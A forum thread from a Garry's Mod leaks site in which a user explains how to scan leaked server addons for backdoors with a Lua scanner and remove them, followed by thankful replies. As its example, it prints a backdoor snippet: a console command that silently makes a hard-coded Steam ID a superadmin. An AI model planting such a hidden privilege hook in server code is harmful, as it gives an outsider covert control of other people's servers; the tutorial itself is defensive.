Garry's Mod Leaks

- How To Look For Backdoors On Leaks -

Submitted by TupacAmaruShakur, , Thread ID: 113573

Thread Closed
28-12-2018, 07:34 AM
This post was last modified: 28-12-2018, 08:03 AM by TupacAmaruShakur
#1
Hello,

I present this tutorial that will help you find if your server suffers a backdoor, an addon can be infected and infected people who can put superadmin on your server or do more malicious damage ..
To remind that a person can not access your FTP if it has not given the access yourself.

Step 1: Find the backdoor

-You Will first download this addon and put it in the addon of your server on the

1-[/url][url=https://github.com/THABBuzzkill/nomalua/archive/master.zip]Click Me And I Will Download What You Need!


Where the download came from and more instructions

2-

-Add the files/addons you want scanned in your addons folder
-Then You restart your server and connect it once it reboots.
-Once Your server you type in your console (console ingame):

nomalua_scan


-Your Server will crash during scanning, ie 10-15 seconds but does not crash so stay on.
-After The crash of 10-15 seconds re-open your console (in-game) and you'll observe something like:


1 - FILESYS (Reading file contents) addons/smugglesystem/lua/autorun/server/smug_server.lua:138 local PositionFile = file.Read("craphead_scripts/smuggle_system/".. string.lower(game.GetMap()) .."/smuggletruck_location.txt", "DATA")
1 - MISC (References global table) gamemodes/darkrp/gamemode/libraries/fn.lua:120 GetGlobalVar = function(key) return _G[key] end
4 - NETWORK (HTTP server call) lua/autorun/photon/cl_emv_airel.lua:17 http.Fetch( fetchUrl,
1 - FILESYS (Reading file contents) addons/steamnamerewarder/lua/autorun/snr_main.lua:52 local fileRead = file.Read( "playerlist.txt" )
1 - FILESYS (Reading file contents) addons/steamnamerewarder/lua/autorun/snr_main.lua:92 local fileCheck = file.Read("playerlist.txt")
1 - FILESYS (Reading file contents) addons/steamnamerewarder/lua/autorun/snr_main.lua:142 file.Read( "playerlist.txt" )
4 - NETWORK (HTTP server call) gamemodes/darkrp/gamemode/modules/darkrpmessages/cl_darkrpmessage.lua:16 http.Fetch("https://raw.github.com/FPtje/DarkRPMotd/master/motd.txt", receiveMOTD, fn.Id)
2 - AUTHENT (Presence of Steam ID) lua/autorun/tdmcars_vols60_police.lua:2 Guillaume (STEAM_0:0:71249946)
1 - MISC (References global table) lua/includes/util.lua:267 _G[ name ] = NUM_AI_CLASSES
2 - FILESYS (File deletion) lua/includes/util/javascript_util.lua:13 html:AddFunction( "gmod", "DeleteLocal", function( param ) file.Delete( param, "MOD" ) end )
1 - MISC (References global table) lua/includes/util/javascript_util.lua:14 html:AddFunction( "gmod", "FetchItems", function( namespace, cat, offset, perpage, ... ) _G[ namespace ]:Fetch( cat, tonumber( offset ), tonumber( perpage ), { ... } ) end )
1 - MISC (References global table) lua/includes/util/javascript_util.lua:16 html:AddFunction( "gmod", "Publish", function( namespace, file, background ) _G[ namespace ]:Publish( file, background ) end )
[size=85][font=Helvetica Neue, Helvetica, Arial, sans-serif]2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:52 Chromebolt A.K.A. Unib5 (STEAM_0:1:19045957)[/font][/size]
2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:55 Falco A.K.A. FPtje Atheos (STEAM_0:0:8944068)
2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:58 Drakehawke (STEAM_0:0:22342869) (64 commits on old SVN)
2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:62 Eusion (STEAM_0:0:20450406) (3 commits on old SVN)


We see many things .

For example an infected addon you will see something like that :

2 - AUTHENT (Presence of Steam ID) addons/prisonrptimer/lua/autorun/prisonrp_timer.lua:101 if ( ply:SteamID() == "STEAM_0:1:64045285") then


The "if (ply: Unique ID () ==" STEAM_0: 1: 64045285 ") then" is clearly a backdoor.
Look at the lines 'AUTHENT (Presence of Steam ID)' and if[Image: smile.png]

Step 2: Remove backdoor

We will take that line:

2 - AUTHENT (Presence of Steam ID) addons/prisonrptimer/lua/autorun/prisonrp_timer.lua:101 if ( ply:SteamID() == "STEAM_0:1:64045285") then


To remove the infected you in the way you have given: addons / prisonrptimer / lua / autorun and you open prison_timer.lua then you go on line 101.
We have this line 101 and you just have to remove the person like that will not have the opportunity to do things:

concommand.Add( "EFM", function(ply)
if ( ply:SteamID() == "STEAM_0:1:64045285") then
RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin")
else
ply
:ChatPrint("Rcon commands Enable, " .. ply:Name() .. ".")
end
end)


I hope i helped you with this!


Scan and other information

SHA256: 211d48a1f2d5ac73a48f94ed80dea0e458a0137fca453c0eccb9acfe79952920
File name: detect.zip
Detection ratio: 0 / 54
Analysis date: 2016-07-21 06:37:35 UTC ( 2 minutes ago )


Contained files
This file is a compressed stream containing 11 files.
[+] nomalua/lua/autorun/init.lua unknown 245 Bytes
[+] nomalua/lua/cl_nomalua.lua unknown 191 Bytes
[+] nomalua/lua/sh_nomalua.lua unknown 109 Bytes
[+] nomalua/lua/sv_nomalua.lua unknown 3451 Bytes
[+] nomalua/lua/sv_nomalua_checkdefs.lua unknown 1950 Bytes
[+] nomalua/lua/sv_nomalua_utils.lua unknown 2137 Bytes
[+] nomalua/lua/sv_nomalua_whitelist.lua unknown 1188 Bytes
[+] nomalua/readme.txt unknown 6395 Bytes
[+] nomalua/ directory 0 Bytes
[+] nomalua/lua/ directory 0 Bytes
Show all
Compression metadata
Contained files11
Uncompressed size15666
Highest datetime2015-04-21 10:27:54
Lowest datetime2015-04-20 17:44:54
Contained files by extension
lua7
txt1
Contained files by type
unknown8
directory3
ExifTool file metadata
MIMETypeapplication/zip
ZipRequiredVersion20
ZipCRC0x00000000
FileTypeZIP
ZipCompressionNone
ZipUncompressedSize0
ZipCompressedSize0
FileTypeExtensionzip
ZipFileNamenomalua/
ZipBitFlag0
ZipModifyDate2015:04:21 10:27:26

MD5 80d8970db9c26c7fa0c15ad9ac794322
SHA1
9e09f2a7e850250de685b2eb0238de9eebad1e3f
SHA256
211d48a1f2d5ac73a48f94ed80dea0e458a0137fca453c0eccb9acfe79952920
ssdeep192
:B9pCeI4k44AcA5xky4litNWmoxaoVTGFnPZ9yUYTc+X:B94Ok4vcAJmm9ogzy7I+X
File size 8.1 KB ( 8302 bytes )
File type ZIP
Magic literalZip archive data, at least v2.0 to extract
TrID ZIP compressed archive (100.0%)
Tagszip
VirusTotal metadata
First submission 2016-07-21 06:37:35 UTC ( 2 minutes ago )
Last submission 2016-07-21 06:37:35 UTC ( 2 minutes ago )
File names detect.zip




I HAVE ANOTHER SCANNER ON THE WAY, BOTH ARE GOOD, SO IT'S OPINION. TELL ME WHAT YOU THINK!
This hidden content has been reported as still working 0 times this month.
1 times in total
[Image: giphy.gif]

RE: - How To Look For Backdoors On Leaks -

#2
Watch this program be a backdoor xd

jk thanks for this

RE: - How To Look For Backdoors On Leaks -

OP
#3
28-12-2018, 03:57 PM
Kermit2781 Wrote:
Watch this program be a backdoor xd

jk thanks for this

Lol that if someone wanted to it could be, but it's not. I'm working on another one it's supposed to be better than this one! I'll post it soon!
[Image: giphy.gif]

RE: - How To Look For Backdoors On Leaks -

#4
Kiss edccdeec Kiss
Kiss
Kiss
Kiss
Kiss

RE: - How To Look For Backdoors On Leaks -

#5
Ohh nice this is simpel thx for held Heart Eyes I hate backdoors

RE: - How To Look For Backdoors On Leaks -

#6
Good tutorial! I hope i'll use this one day if i ever get into gmod again..

RE: - How To Look For Backdoors On Leaks -

#7
THNKS MAN, it's good script to check backdoors, I have removed 5 backdoors

RE: - How To Look For Backdoors On Leaks -

#8
this is pretty cool been looking for something like this for a long time

RE: - How To Look For Backdoors On Leaks -

#9
Genuinely good guide. Leaked addons often contain backdoors, and that would be lethal for one's server. This thread is quite good for "newbs", as somewhat experienced LUA coders will easily spot unnecessary or malicious code.

RE: - How To Look For Backdoors On Leaks -

#10
Thanks man much appreciated you did a good job if you made it if not thanks alot for sharing

Users browsing this thread: 11 Guest(s)